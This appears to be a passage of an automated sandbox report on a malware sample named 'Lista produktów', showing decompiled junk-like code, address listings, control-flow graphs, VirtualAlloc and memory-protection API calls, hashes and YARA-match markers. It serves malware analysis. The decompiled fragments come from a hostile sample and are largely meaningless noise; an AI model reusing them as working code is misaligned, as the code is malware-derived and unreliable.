                  						 *((intOrPtr*)(_t57 + 0x6600ffff)) =  *((intOrPtr*)(_t57 + 0x6600ffff)) + _t53;
                  						asm("invalid");
                  						 *_t53 =  *_t53 + _t63;
                  						 *_t48 =  *_t48 + 1;
                  						 *_t48 =  *_t48 + 1;
                  						asm("int3");
                  						asm("int3");
                  						 *_t48 =  *_t48 + 1;
                  						asm("cdq");
                  						asm("int3");
                  						 *_t48 =  *_t48 + 1;
                  						asm("o16 int3");
                  						 *_t48 =  *_t48 + 1;
                  						 *_t48 =  *_t48 + 1;
                  						_t49 = _t48 + (_t57 ^ _t73 - 0x00000001);
                  						 *_t49 =  *_t49 + 1;
                  						[far dword [ecx-0x6633ff01]();
                  						 *_t49 =  *_t49 + 1;
                  						asm("cdq");
                  						asm("cdq");
                  						 *_t49 =  *_t49 + 1;
                  						asm("cwd");
                  						 *_t49 =  *_t49 + 1;
                  						 *_t49 =  *_t49 + 1;
                  						goto ( *((intOrPtr*)(_t68 - 1)));
                  					}
                  					 *0x47001201 =  *0x47001201 + _t57;
                  					_t80 =  *0x47001201;
                  					if (_t80 < 0) goto L18;
                  					break;
                  				}
                  				if(_t80 != 0) {
                  					goto L18;
                  				}
                  				if(_t80 < 0) {
                  					goto L16;
                  				}
                  				if(_t80 < 0) {
                  					goto L17;
                  				}
                  				if(_t80 >= 0) {
                  					goto L15;
                  				}
                  				if(_t80 >= 0) {
                  					goto L14;
                  				}
                  				asm("insd");
                  				asm("insd");
                  				asm("gs outsb");
                  				if(_t80 >= 0) {
                  					goto L19;
                  				}
                  				asm("outsb");
                  				_t63 = _t63 + 1;
                  				 *_t63 =  *_t63 + _t47;
                  				 *_t53 =  *_t53 + _t73;
                  				asm("invalid");
                  				 *_t47 =  *_t47 + _t47;
                  				asm("insb");
                  				if ( *_t47 == 0) goto L12;
                  				 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t68 + 8)) + _t53;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 & _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t57;
                  				 *((intOrPtr*)(_t47 + 0x16000008)) =  *((intOrPtr*)(_t47 + 0x16000008)) + _t57;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t57;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 | _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *((char*)(_t47 + _t47)) =  *((char*)(_t47 + _t47));
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				goto L13;
                  			}






















                  0x004013f0
                  0x004013f5
                  0x004013fa
                  0x004013fc
                  0x004013fe
                  0x00401400
                  0x00401402
                  0x00401404
                  0x00401405
                  0x00401407
                  0x00401409
                  0x0040140b
                  0x0040140f
                  0x00401410
                  0x00401413
                  0x00401414
                  0x00401419
                  0x0040141a
                  0x0040141a
                  0x0040141b
                  0x0040141d
                  0x0040141f
                  0x00401421
                  0x00401423
                  0x00401425
                  0x00401427
                  0x00401429
                  0x00401433
                  0x00401435
                  0x00401436
                  0x00401437
                  0x00401438
                  0x0040143a
                  0x0040143b
                  0x0040143d
                  0x0040143f
                  0x00401441
                  0x00401442
                  0x00401444
                  0x00401445
                  0x00401446
                  0x00401448
                  0x0040144f
                  0x00000000
                  0x00000000
                  0x00401451
                  0x00401454
                  0x00401455
                  0x00000000
                  0x00000000
                  0x00401457
                  0x0040145a
                  0x0040145a
                  0x0040145d
                  0x0040145d
                  0x0040145d
                  0x00401464
                  0x0040146e
                  0x00401470
                  0x00401471
                  0x00401474
                  0x00401474
                  0x00401475
                  0x00401477
                  0x00401479
                  0x0040147b
                  0x0040147d
                  0x0040147f
                  0x00401481
                  0x00401483
                  0x00401485
                  0x00401487
                  0x00401489
                  0x0040148b
                  0x0040148d
                  0x0040148f
                  0x00401491
                  0x00401493
                  0x00401495
                  0x00401497
                  0x0040149b
                  0x0040149d
                  0x0040149f
                  0x004014a1
                  0x004014a3
                  0x004014a3
                  0x004014a6
                  0x004014a9
                  0x00401510
                  0x00401510
                  0x00401512
                  0x00401514
                  0x00401516
                  0x00401518
                  0x00401519
                  0x00401519
                  0x0040151b
                  0x0040151b
                  0x0040151e
                  0x00401521
                  0x00401524
                  0x00401524
                  0x00401525
                  0x00401525
                  0x00401528
                  0x00401528
                  0x0040152e
                  0x00401531
                  0x00401532
                  0x00401532
                  0x00401535
                  0x00401538
                  0x0040153a
                  0x0040153d
                  0x0040153e
                  0x00401540
                  0x00401546
                  0x00401548
                  0x0040154b
                  0x0040154f
                  0x00401551
                  0x00401552
                  0x00401553
                  0x00401555
                  0x00401556
                  0x00401557
                  0x00401559
                  0x0040155b
                  0x0040155f
                  0x00401561
                  0x00401563
                  0x00401565
                  0x0040156b
                  0x0040156d
                  0x0040156e
                  0x0040156f
                  0x00401571
                  0x00401573
                  0x0040157b
                  0x0040157d
                  0x0040157d
                  0x004014ab
                  0x004014ab
                  0x004014b1
                  0x00000000
                  0x004014b1
                  0x004014b2
                  0x00000000
                  0x00000000
                  0x004014b3
                  0x00000000
                  0x00000000
                  0x004014b4
                  0x00000000
                  0x00000000
                  0x004014b5
                  0x00000000
                  0x00000000
                  0x004014b6
                  0x00000000
                  0x00000000
                  0x004014b8
                  0x004014b9
                  0x004014ba
                  0x004014bc
                  0x00000000
                  0x00000000
                  0x004014be
                  0x004014c6
                  0x004014c7
                  0x004014c9
                  0x004014cb
                  0x004014cd
                  0x004014cf
                  0x004014d0
                  0x004014d2
                  0x004014d8
                  0x004014da
                  0x004014dc
                  0x004014de
                  0x004014e0
                  0x004014e2
                  0x004014e4
                  0x004014ea
                  0x004014ec
                  0x004014ee
                  0x004014f0
                  0x004014f2
                  0x004014f4
                  0x004014f7
                  0x004014f9
                  0x004014fb
                  0x004014fd
                  0x004014ff
                  0x00401501
                  0x00401505
                  0x00401507
                  0x00401509
                  0x0040150b
                  0x0040150d
                  0x0040150f
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: #100
                  • String ID: VB5!6&*
                  • API String ID: 1341478452-3593831657
                  • Opcode ID: 605976478f3439c3e8fee535f61cf35f13009986f664e7087156937f1c5b5280
                  • Instruction ID: 9fab2b6fabe600f068c2f63924970bbf018eec735d31a0b40c771a2bf6c28a58
                  • Opcode Fuzzy Hash: 605976478f3439c3e8fee535f61cf35f13009986f664e7087156937f1c5b5280
                  • Instruction Fuzzy Hash: ED41EC6144E7C15FD713877499296917FB0AF93214F0A46EBC0C1CE0F3E66C085AC726
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 274 4072f2-4072f5 275 4072f7 274->275 276 4072cb-4072f0 274->276 277 40730f-4073bc 275->277 276->277 280 4073c2-40744c 277->280 283 407452-4077dd VirtualAlloc 280->283 295 4077e3-407898 call 40791e 283->295 300 40789e-4078f9 295->300 303 4078fc 300->303 303->303
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID: ]
                  • API String ID: 0-1813045944
                  • Opcode ID: 026f9062b31725f4c66f7ce4a0c0791d29cda6018883c4b2a0cbbc7fdb149a4e
                  • Instruction ID: 5cb936610358edf67e69ebdada450720991b8b7aa82f53928fa75916d53864f3
                  • Opcode Fuzzy Hash: 026f9062b31725f4c66f7ce4a0c0791d29cda6018883c4b2a0cbbc7fdb149a4e
                  • Instruction Fuzzy Hash: CD71F362F1CB1185FF362128C9E056D6502DB92340F32873BCE1A33DC55B3E1AC6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 305 40729b-4073bc 309 4073c2-40744c 305->309 312 407452-4077dd VirtualAlloc 309->312 324 4077e3-407898 call 40791e 312->324 329 40789e-4078f9 324->329 332 4078fc 329->332 332->332
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: b14317a1b95eb7fb6f98b90cde7b908e5267775d6f79e6cde9a64cc7a6d4b340
                  • Instruction ID: bf29c1fa0c6e9e411c278d4fae329d64b8795db5c212fe72bb17e34f809f6fc5
                  • Opcode Fuzzy Hash: b14317a1b95eb7fb6f98b90cde7b908e5267775d6f79e6cde9a64cc7a6d4b340
                  • Instruction Fuzzy Hash: 90711222F1CB518AFF322168C8E452C6512DF92344F36873BCD6A338C65B3E16C6665B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 333 407343-4073bc 335 4073c2-40744c 333->335 338 407452-4077dd VirtualAlloc 335->338 350 4077e3-407898 call 40791e 338->350 355 40789e-4078f9 350->355 358 4078fc 355->358 358->358
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: cd606f3dea50bf9def4e8435a9b48599cee8ad992a80da5c0ec11a71d66edc4b
                  • Instruction ID: 11e62355e28bf5b0b5eb84a69bb6a926bd9fe31704dbc57449b658905cdd9b02
                  • Opcode Fuzzy Hash: cd606f3dea50bf9def4e8435a9b48599cee8ad992a80da5c0ec11a71d66edc4b
                  • Instruction Fuzzy Hash: DC615622F1D75189FF362168C9E442C6912DF92344F36867BCE5A32CC6473E1AC6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 359 4073e0-4073e5 360 407400-40744c 359->360 362 4073c2-4073de 360->362 363 407452-4077dd VirtualAlloc 360->363 362->360 375 4077e3-407898 call 40791e 363->375 380 40789e-4078f9 375->380 383 4078fc 380->383 383->383
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 1c464b8f69c8da1a10573afe0e2bed3b1c333b402504d6f4180088321439afa6
                  • Instruction ID: 2a78bffd9da8c5cd6a95bbbd3bc339c4bcd3bb774dd5b2c75ea8e3e25570884b
                  • Opcode Fuzzy Hash: 1c464b8f69c8da1a10573afe0e2bed3b1c333b402504d6f4180088321439afa6
                  • Instruction Fuzzy Hash: 18510362F19B2189FF352168C9E056D6502DBD6345F32873BCD6A33CC4573E1AC2269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 384 40742d-407430 385 40744c 384->385 386 4073c2-40742a 385->386 387 407452-4077dd VirtualAlloc 385->387 386->385 400 4077e3-407898 call 40791e 387->400 405 40789e-4078f9 400->405 408 4078fc 405->408 408->408
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8a99b25fc36ebd9df1612c21b476e4fa4a7eb669fba86b00a6caf90fc3b11fd
                  • Instruction ID: a360e645ff9bd5e24e0a4946c0fe720855bc71e37bc55657463ebb657b5c4ded
                  • Opcode Fuzzy Hash: b8a99b25fc36ebd9df1612c21b476e4fa4a7eb669fba86b00a6caf90fc3b11fd
                  • Instruction Fuzzy Hash: 13510262F19B1185FF352068C9E056D6402DBD6344F32873BCE6A33CC51B3E2AC6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 4074d9-4077dd VirtualAlloc 421 4077e3-407898 call 40791e 409->421 426 40789e-4078f9 421->426 429 4078fc 426->429 429->429
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: b22397b0fcf65feab463d9bccd4747f20ddeb3385f6ca212c33f01e1a97c3f1e
                  • Instruction ID: 4fe24c6d73bb709be309c73bf8fdc04b21a3f237e4a2d25d0b51aeb91469d2ba
                  • Opcode Fuzzy Hash: b22397b0fcf65feab463d9bccd4747f20ddeb3385f6ca212c33f01e1a97c3f1e
                  • Instruction Fuzzy Hash: E641D262F19B5189FF352168C9E057D6002DB92345F32873BCE6A33CC51A3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 430 407483-4077dd VirtualAlloc 441 4077e3-407898 call 40791e 430->441 446 40789e-4078f9 441->446 449 4078fc 446->449 449->449
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: e572bebdb34add92f2f4c9be5cbf09df24f40f7c8ed96bccb0f513679d5213f5
                  • Instruction ID: 154b30db0a55406d83b5b8e193aeae642a6a5a3c2202c726383ed4df5e56d3d4
                  • Opcode Fuzzy Hash: e572bebdb34add92f2f4c9be5cbf09df24f40f7c8ed96bccb0f513679d5213f5
                  • Instruction Fuzzy Hash: C1511362F19B5189FF362068C9E046D6402DB92344F33873BCE6A33CC55B3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 450 40752a-4077dd VirtualAlloc 460 4077e3-407898 call 40791e 450->460 465 40789e-4078f9 460->465 468 4078fc 465->468 468->468
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4f1b998a34c6b5a0a635c7623959a6862db6684b8fe20d6913213713a5b9f8cf
                  • Instruction ID: 96614bbff12802478ec3d2f3d8fcfdd40b4236943381960600768c07c7496fef
                  • Opcode Fuzzy Hash: 4f1b998a34c6b5a0a635c7623959a6862db6684b8fe20d6913213713a5b9f8cf
                  • Instruction Fuzzy Hash: 7641E462F19B1189FF762068CDE457D5402DB92345F33863BCE6A33CC51A3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: ac639d5a7f0f5546f6f0157c6f0b1d7803887e482175168b4989e784691b4e2f
                  • Instruction ID: ec914b86d1bb50d9ed2413c39d3d729a4bf9be374acd605a14455209d6e39d1a
                  • Opcode Fuzzy Hash: ac639d5a7f0f5546f6f0157c6f0b1d7803887e482175168b4989e784691b4e2f
                  • Instruction Fuzzy Hash: 9D310562F19B1189FF362078C9E457D6402DB91345F33863BCD6A73CC51A3E1AC6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4211a8b13cb5a03b99393e97fb5f05f8aa6699327dea4a784de2692920dbf2aa
                  • Instruction ID: e2ef045f04a7ef4f914fe40045dbe9312fff5e6d1d9282fb5b22ca9b7b84ad95
                  • Opcode Fuzzy Hash: 4211a8b13cb5a03b99393e97fb5f05f8aa6699327dea4a784de2692920dbf2aa
                  • Instruction Fuzzy Hash: A0310462F19B5189FF352068C9E457D6502DB92341F33863BCDAA73CC51A3E1AC2269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4c19a3d13d2586d80cc479228ecea574a31d6a3adfc4845765ef646fa3922d80
                  • Instruction ID: 119c0e4d5293e96035be259592eea929490109dbbe2b0fa615fb94458560f716
                  • Opcode Fuzzy Hash: 4c19a3d13d2586d80cc479228ecea574a31d6a3adfc4845765ef646fa3922d80
                  • Instruction Fuzzy Hash: BE110B72F18B1045FF753174C9E457D6012CB81382F32863BC91772CC56A3D1AC6669B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 0d8a7d25b81f7e0da7e097ea3b033bcec0974285829d66699d24c562e75006aa
                  • Instruction ID: 6358c9dda5d0c3c0788fe4e698052f47d0b53466e4a241c1b359710df31892a1
                  • Opcode Fuzzy Hash: 0d8a7d25b81f7e0da7e097ea3b033bcec0974285829d66699d24c562e75006aa
                  • Instruction Fuzzy Hash: B821D862F18B6149FF763064C9E457D6002DB91381F32863BCD6A33DC52A3D1AC2669B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 338cd700dafa85d28a21a5e6048444be05e774746d51bbc5070abe4758e59dac
                  • Instruction ID: c6a383a199cf7e2f287068a76fa4735f40791d7ca05321655cbe3ad344c7dbc9
                  • Opcode Fuzzy Hash: 338cd700dafa85d28a21a5e6048444be05e774746d51bbc5070abe4758e59dac
                  • Instruction Fuzzy Hash: AF220875700306AFEB259F28CC81BE577A1FF49750F148228FD88972D0E7B9E8559B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48a696b7d2e043c66f55c1d75c2f528d2a8a44a069570125f8798bd606199034
                  • Instruction ID: a29d45689aac7dd562dadeab27c1e5541e96d4c76cb10b0536220b4a7406911a
                  • Opcode Fuzzy Hash: 48a696b7d2e043c66f55c1d75c2f528d2a8a44a069570125f8798bd606199034
                  • Instruction Fuzzy Hash: 3EB1F5743403467FFB210E28CD45BEA3A62FF49750F248228FE48AB1D0E7B99C989754
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 7225ce9cde987dee87723e84a231c2bf4940d8c792584c2a9e85917153cd1595
                  • Instruction ID: 427e2caa23c81c427524ec1500eafbf3d07d190d4b5c75ec0834f5517d8bf182
                  • Opcode Fuzzy Hash: 7225ce9cde987dee87723e84a231c2bf4940d8c792584c2a9e85917153cd1595
                  • Instruction Fuzzy Hash: 1D81AA31B402866FFF3529288C94BEE2252EF96764F680519FE44A71E5FB39C4C5C622
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 6658ee675f6920bbec426edf19c1f2665f5b4bc048cb6e138b2c2339fc3823fc
                  • Instruction ID: 438f8ee8ad25497a0a77584e2a881f1d52234d4b78806e71a5f8cdda001e185b
                  • Opcode Fuzzy Hash: 6658ee675f6920bbec426edf19c1f2665f5b4bc048cb6e138b2c2339fc3823fc
                  • Instruction Fuzzy Hash: BB91B524A44792DEDF25CF3CC8D8729B691AF16224F5882ADC9968F3E7D734C481D722
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                  • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ba2c7ca9f9feec564bed2e14270e1cb2d84631ef4eb3f1548dee284e5260954
                  • Instruction ID: 2c062794e2dde2885cf056b157e7a26f9cbe3ce0ed8af47948da68ec9b3da9d9
                  • Opcode Fuzzy Hash: 0ba2c7ca9f9feec564bed2e14270e1cb2d84631ef4eb3f1548dee284e5260954
